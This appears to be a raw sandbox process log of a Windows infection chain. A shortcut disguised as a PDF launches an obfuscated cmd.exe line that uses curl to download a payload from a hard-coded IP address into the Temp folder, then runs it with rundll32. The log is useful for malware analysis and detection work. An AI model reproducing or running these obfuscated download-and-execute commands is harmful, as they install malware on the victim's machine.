cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "SvDjmYYOk" C:\Users\test22\AppData\Local\Temp\OT.pdf.lnk
2648cmd.exe "C:\Windows\System32\cmd.exe" /c n4X || ECHo n4X & P"IN"G n4X || c"URl" h"t"t"p:"//13"5."1"2"5.17"7."82"/"U"MY"A"p"d4"/"uD -o C:\Users\test22\AppData\Local\Temp\n4X.log & P"IN"G -n 3 n4X || rundll32 C:\Users\test22\AppData\Local\Temp\n4X.log scab /k besogon728 & E"xI"T 'YbgZ=Rm=Hhj
2776PING.EXE P"IN"G n4X
2860curl.exe c"URl" h"t"t"p:"//13"5."1"2"5.17"7."82"/"U"MY"A"p"d4"/"uD -o C:\Users\test22\AppData\Local\Temp\n4X.log
2932PING.EXE P"IN"G -n 3 n4X
604rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\n4X.log scab /k besogon728
1384